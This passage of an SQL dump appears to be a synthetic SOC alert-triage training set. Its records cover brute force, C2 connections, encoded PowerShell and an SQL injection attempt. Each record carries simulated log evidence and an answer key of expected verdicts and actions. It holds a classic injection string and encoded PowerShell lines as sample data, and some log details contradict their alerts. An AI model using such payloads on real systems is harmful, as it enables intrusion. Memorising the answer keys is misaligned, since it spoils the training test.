aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.011Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.5\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"finance-pc\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.011Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.5\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"finance-pc\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.011Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.5\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"finance-pc\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.011Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.5\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"finance-pc\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1698, 'Malicious Network Connection from Internal IP', 'medium', 'Carbon Black', 'An internal machine made a suspicious outbound connection to a known malicious IP address.', 'Data Exfiltration', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:21:15Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.0.2.45\",\"username\":\"tblack\",\"hostname\":\"server02\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for hosting command and control infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The connection to a known malicious IP indicates possible data exfiltration, justifying the positive verdict.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.019Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:21:15Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.0.2.45\\\",\\\"username\\\":\\\"tblack\\\",\\\"hostname\\\":\\\"server02\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.019Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:21:15Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.0.2.45\\\",\\\"username\\\":\\\"tblack\\\",\\\"hostname\\\":\\\"server02\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.019Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:21:15Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.0.2.45\\\",\\\"username\\\":\\\"tblack\\\",\\\"hostname\\\":\\\"server02\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.019Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:21:15Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.0.2.45\\\",\\\"username\\\":\\\"tblack\\\",\\\"hostname\\\":\\\"server02\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.019Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:21:15Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.0.2.45\\\",\\\"username\\\":\\\"tblack\\\",\\\"hostname\\\":\\\"server02\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1699, 'Failed Login Attempts from Foreign IP', 'medium', 'SentinelOne', 'Multiple failed login attempts detected from an IP address located in a foreign country. Possible credential brute force attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:54:12Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"auth-server\",\"failed_attempts\":17}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for frequent brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Common target username for brute force attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The volume and origin of failed login attempts suggest a brute force attack, supporting the positive classification.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.026Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:54:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.85\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":17}\"},{\"timestamp\":\"2026-03-15T20:57:16.026Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:54:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.85\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":17}\"},{\"timestamp\":\"2026-03-15T20:56:16.026Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:54:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.85\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":17}\"},{\"timestamp\":\"2026-03-15T20:55:16.026Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:54:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.85\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":17}\"},{\"timestamp\":\"2026-03-15T20:54:16.026Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password 
for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:54:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.85\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":17}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1700, 'Unexpected Internal Traffic Detected', 'low', 'Sysmon', 'Unusual internal network traffic detected, originating from an internal IP, but no malicious activity confirmed.', 'Lateral Movement', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"10.0.0.50\",\"username\":\"jdoe\",\"hostname\":\"workstation03\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network communication\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network communication\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The traffic was between internal IPs and consistent with routine activity, confirming it as a false positive.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.029Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.45\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation03\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.029Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.45\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation03\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.029Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.45\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation03\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.029Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.45\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation03\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.029Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.45\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1701, 'Suspicious Encoded PowerShell Execution', 'medium', 'CrowdStrike', 'An encoded PowerShell command was executed, but further analysis indicated it was a legitimate administrative script.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"198.51.100.10\",\"username\":\"admin\",\"hostname\":\"admin-pc\",\"command_line\":\"powershell.exe -EncodedCommand U29tZSBBZG1pbmlzdHJhdGl2ZSBTY3JpcHQ=\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand U29tZSBBZG1pbmlzdHJhdGl2ZSBTY3JpcHQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded command verified as legitimate administrative task\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command was a legitimate administrative operation, hence categorized as a false positive.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1702, 'SQL Injection Attempt Detected on Web Server', 'high', 'Carbon Black', 'Detected SQL injection attempt on the company\'s web server. Malicious payload targeting database vulnerabilities.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:30:55Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.20\",\"dst_ip\":\"192.168.1.100\",\"username\":\"webuser\",\"hostname\":\"web-server\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected in URL parameters\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for malicious web activity\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload matches a classic SQL injection attempt, confirming the threat as a true positive.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.035Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.20\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' 
--\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.035Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.20\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.035Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.20\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.035Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.20\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.035Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.20\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1703, 'Abnormal Internal Traffic with Base64 Encoded Payload', 'medium', 'SentinelOne', 'Observed unusual internal traffic with a Base64 encoded payload. Further investigation revealed routine data transfer.', 'Data Exfiltration', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:10:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"172.16.0.10\",\"dst_ip\":\"172.16.0.15\",\"username\":\"mwhite\",\"hostname\":\"data-node\",\"request_body\":\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"172.16.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Payload is part of a routine data transfer\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The traffic and encoded payload were initially suspicious but were confirmed to be part of routine operations.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.038Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:10:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"172.16.0.10\\\",\\\"dst_ip\\\":\\\"172.16.0.15\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"data-node\\\",\\\"request_body\\\":\\\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.038Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:10:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"172.16.0.10\\\",\\\"dst_ip\\\":\\\"172.16.0.15\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"data-node\\\",\\\"request_body\\\":\\\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.038Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:10:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"172.16.0.10\\\",\\\"dst_ip\\\":\\\"172.16.0.15\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"data-node\\\",\\\"request_body\\\":\\\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.038Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:10:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"172.16.0.10\\\",\\\"dst_ip\\\":\\\"172.16.0.15\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"data-node\\\",\\\"request_body\\\":\\\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.038Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:10:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"172.16.0.10\\\",\\\"dst_ip\\\":\\\"172.16.0.15\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"data-node\\\",\\\"request_body\\\":\\\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1704, 'PowerShell Download Cradle Detected', 'critical', 'CrowdStrike', 'A PowerShell download cradle was detected executing an encoded script on an internal host. This indicates potential malware delivery or execution.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:25:14Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"CORP-PC-01\",\"command_line\":\"powershell.exe -EncodedCommand ZQBjAGgAbwAgACcASABlAGwAbABvACcA\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand ZQBjAGgAbwAgACcASABlAGwAbABvACcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution indicating potential malware activity\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell encoded command indicates a likely malware execution attempt, requiring immediate isolation and investigation.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 